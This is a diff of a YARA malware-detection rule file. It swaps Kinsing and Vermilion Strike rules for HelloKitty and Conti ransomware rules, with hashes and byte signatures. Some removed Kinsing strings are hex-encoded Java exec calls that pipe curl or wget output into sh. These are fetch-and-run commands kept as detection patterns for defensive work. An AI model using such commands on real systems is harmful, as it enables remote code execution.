+		level = "Experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
-		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
-		$ClassCode3 = "java/net/URL" fullword ascii
-		$ClassCode4 = "java/net/URLConnection" fullword ascii
-		$ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
-		$Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
-		$Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
-		$Com3 = "chmod +x " fullword ascii
-		$Com4 = { 53 4b 4c 01 00 02 6c 66 }
-		$s1 = "User-Agent" fullword ascii
-		$s2 = "kinsing" fullword ascii
-		$s3 = { 6f 73 2e 6e 61 6d 65 }
-		$s4 = "getAbsolutePath" fullword ascii
-		$s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e }
+		$s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 }
+		$s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 }
+		$s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c }
+		$s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 }
 
 	condition:
-		filesize < 1KB and 4 of ( $ClassCode* ) and 3 of ( $Com* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Kinsing Variant B"
+		description = "Detect HelloKitty ransomware"
 		author = "Arkbird_SOLG"
-		id = "7e0f9826-806c-5801-aab5-d2a8dba4e206"
-		date = "2020-08-28"
-		modified = "2020-08-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52"
+		id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91"
+		date = "2021-08-14"
+		modified = "2021-08-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc"
+		logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960"
-		hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0"
+		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
+		hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85"
+		tlp = "White"
+		adversary = "RAAS"
 
 	strings:
-		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
-		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
-		$ClassCode3 = "java/net/URL" fullword ascii
-		$ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
-		$Com1 = "chmod +x " fullword ascii
-		$Com2 = { 53 4b 4c 01 00 02 6c 66 }
-		$s1 = "kinsing" fullword ascii
-		$s2 = "getAbsolutePath" fullword ascii
+		$seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff }
+		$seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 }
+		$seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 }
 
 	condition:
-		filesize < 1KB and 3 of ( $ClassCode* ) and 1 of ( $Com* ) and 2 of ( $s* )
+		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Conti_Loader_V3_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the windows version of the beacon of Vermilion Strike implant"
+		description = "Detect Conti V3 loader"
 		author = "Arkbird_SOLG"
-		id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20"
+		id = "9541b9f8-befe-5bf4-88ee-b1cc5e92f927"
+		date = "2020-12-15"
+		modified = "2020-12-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d"
-		score = 75
-		quality = 75
+		logic_hash = "c3c8530e1963c5af8ee93a5d2cc222abbeb3fb7e82ef6de2068795a38dca67aa"
+		score = 50
+		quality = 71
 		tags = "FILE"
-		hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5"
-		hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f"
-		hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492"
-		tlp = "White"
-		adversary = "Vermilion Strike"
+		level = "experimental"
+		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
+		hash2 = "26b2401211769d2fa1415228b4b1305eeeed249a996d149ad83b6fc9c4f703ce"
 
 	strings:
-		$s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 }
-		$s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 }
-		$s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b }
-		$s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 }
-		$s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a }
+		$seq1 = { 83 ec 1c 68 80 00 00 00 68 54 21 40 00 ff 15 30 20 40 00 85 c0 0f 85 e9 00 00 00 56 57 68 48 21 40 00 89 44 24 14 89 44 24 10 c7 44 24 1c 17 00 00 00 c7 44 24 20 55 1e 00 00 c7 44 24 24 09 04 00 00 ff 15 34 20 40 00 8b 3d 3c 20 40 00 8b f0 68 34 21 40 00 56 ff d7 68 20 21 40 00 56 a3 e4 33 40 00 ff d7 a3 0c 36 40 00 8d 44 24 14 50 6a 03 8d 4c 24 20 51 68 00 00 40 00 ff 15 e4 33 40 00 85 c0 7c 1a 8b 4c 24 14 8d 54 24 0c 52 8d 44 24 14 50 51 68 00 00 40 00 ff 15 0c 36 40 00 68 18 21 40 00 ff 15 70 20 40 00 8b 54 24 10 83 c4 04 50 68 00 10 00 00 52 6a 00 ff 15 38 20 40 00 8b 4c 24 10 8b f0 8b 44 24 0c 50 51 56 e8 4a 00 00 00 8d 54 24 14 52 }
+		$seq2 = { 8b 4c 24 24 8d 44 24 20 50 51 56 e8 1d fe ff ff 83 c4 24 ff d6 8b 54 24 28 5f 89 15 08 36 40 00 5e 33 c0 83 c4 }
+		$s1 = { 3e 35 44 35 4c 35 53 35 58 35 5e 35 64 35 6c 35 72 35 79 35 }
+		$s2 = { 31 07 32 0d 32 25 32 2b 32 30 32 36 32 4c 32 6a 32 }
+		$s3 = "_invoke_watson" fullword ascii
+		$s4 = { 8b 2d bc 36 40 00 0f b6 04 2f 0f b6 da 8b 54 24 14 0f b6 14 13 8d 0c 2f 03 d6 03 c2 99 be 40 03 00 00 f7 fe 0f b6 f2 8d 04 2e e8 7f ff ff ff 8d 43 01 99 f7 7c 24 18 47 81 ff 40 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 30KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and all of ( $seq* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Conti_V3_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of Vermilion Strike implant"
+		description = "Detect Conti V3 ransomware"
 		author = "Arkbird_SOLG"
-		id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc"
-		date = "2021-09-14"
-		modified = "2021-09-16"
-		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19"
+		id = "89702af3-664a-5c4a-8d2b-f195f5dddb6f"
+		date = "2020-12-15"
+		modified = "2020-12-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L24-L43"
 		license_url = "N/A"
-		logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481"
+		logic_hash = "2c8f2fd9b155bb4fdb1304b4d7f683bc679780d079d8bbe4fb308f94769f1392"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"
 		level = "experimental"
-		tlp = "White"
-		adversary = "Vermilion Strike"
+		hash1 = "f092b985b75a702c784f0936ce892595b91d025b26f3387a712b76dcc3a4bc81"
+		hash2 = "35ccc2b71567570bcac62e2f268faca50fa95fad6ac69e74f40856eb8f9ab03d"
 
 	strings:
-		$s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 }
-		$s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d }
-		$s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff }
-		$s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 }
-		$s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 }
+		$seq1 = { 45 8c 00 8d 4d 8c c6 45 8d 7e c6 45 8e 4c c6 45 8f 0e c6 45 90 2c c6 45 91 4d c6 45 92 57 c6 45 93 13 c6 45 94 5d c6 45 95 08 c6 45 96 4c c6 45 97 77 c6 45 98 77 89 85 54 ff ff ff c6 45 99 6e 8a 45 8d e8 9f 0b 00 00 6a 6b 68 a8 21 3d be ba 0f 00 00 00 8b f0 e8 3c 3e 00 00 83 c4 08 56 ff d0 c6 45 f4 00 c6 45 f5 5a c6 45 f6 49 c6 45 f7 4c c6 45 f8 0b c6 45 f9 0b c6 45 fa 66 c6 45 fb 4c c6 45 fc 0b c6 45 fd 0b c6 45 fe 3f 89 85 50 ff ff ff 8a 45 f5 80 7d f4 00 75 2b 33 c9 66 0f 1f 84 00 00 00 00 00 8a 44 0d f5 0f b6 c0 83 e8 3f 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 54 0d f5 41 83 f9 0a 72 e0 6a 6b 68 a8 21 3d be ba 0f 00 00 00 e8 bf 3d 00 00 83 c4 08 8d 4d f5 51 ff d0 c6 85 7c ff ff ff 00 8d 8d 7c ff ff ff c6 85 7d ff ff ff 48 c6 85 7e ff ff ff 17 c6 85 7f ff ff ff 3c c6 45 80 71 c6 45 81 3c c6 45 82 37 c6 45 83 57 c6 45 84 71 c6 45 85 0a c6 45 86 67 c6 45 87 12 c6 45 88 12 89 85 3c }
+		$seq2 = { 6c ff ff ff 00 8d 8d 6c ff ff ff c6 85 6d ff ff ff 02 c6 85 6e ff ff ff 17 c6 85 6f ff ff ff 72 c6 85 70 ff ff ff 3a c6 85 71 ff ff ff 16 c6 85 72 ff ff ff 73 c6 85 73 ff ff ff 10 c6 85 74 ff ff ff 78 c6 85 75 ff ff ff 1c c6 85 76 ff ff ff 00 c6 85 77 ff ff ff 39 c6 85 78 ff ff ff 39 89 85 48 ff ff ff c6 85 79 ff ff ff 71 8a 85 6d ff ff ff e8 1d 08 00 00 6a 6b 68 a8 21 3d }
+		$seq3 = { 8b d9 89 9d b8 fd ff ff c7 85 d4 fd ff ff 0b 01 00 00 c7 85 d8 fd ff ff 0b 02 00 00 c6 85 c4 fd ff ff 00 c6 85 c5 fd ff ff 19 c6 85 c6 fd ff ff 0d c6 85 c7 fd ff ff 27 c6 85 c8 fd ff ff 1f c6 85 c9 fd ff ff 0d c6 85 ca fd ff ff 1b c6 85 cb fd ff ff 28 c6 85 cc fd ff ff 26 c6 85 cd fd ff ff 1e c6 85 ce fd ff ff 0b c6 85 cf fd ff ff 1b c6 85 d0 fd ff ff 1b 8d 8d c4 fd ff ff c6 85 d1 fd }
